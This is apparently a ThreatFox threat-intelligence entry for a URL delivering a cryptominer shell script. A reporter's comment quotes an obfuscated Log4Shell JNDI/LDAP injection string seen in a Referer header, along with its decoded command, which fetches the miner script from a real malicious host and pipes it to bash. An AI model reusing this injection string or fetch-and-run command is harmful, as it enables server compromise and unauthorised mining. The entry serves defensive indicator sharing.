ThreatFox IOC Database

You are viewing the ThreatFox database entry for url http://31.57.109.131/scripts/4thepool_miner.sh.

Database Entry

Add tag Delete this IOC  Report False Positive Export IOC (JSON)    Export IOC (CSV)
IOC ID:1820020
IOC: http://31.57.109.131/scripts/4thepool_miner.sh
IOC Type :url
Threat Type :payload_delivery
Malware: Unknown malware
Confidence Level : Confidence level is moderate (50%)
Is compromised? : False
ASN:AS58212 DATAFOREST
Country:- DE
First seen:2026-05-30 15:14:01 UTC
Last seen:never
UUID:afd37803-5bfd-11f1-b930-42010aa4000a
Reporter Anonymous
Reward 5 credits from ThreatFox
Tags:CryptoMiner sh miner ubuntu

Avatar
Anonymous
It appears that a Chinese actor is attempting to pass this malformed request in the headers as the referer “t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//148.113.233.202:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTcuMTA5LjEzMS9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}’)”. The shell execution is encoded in base64 and contains the following command: “export HOME=/tmp; curl -s -L http://31.57.109.131/scripts/4thepool_miner.sh | bash -s”.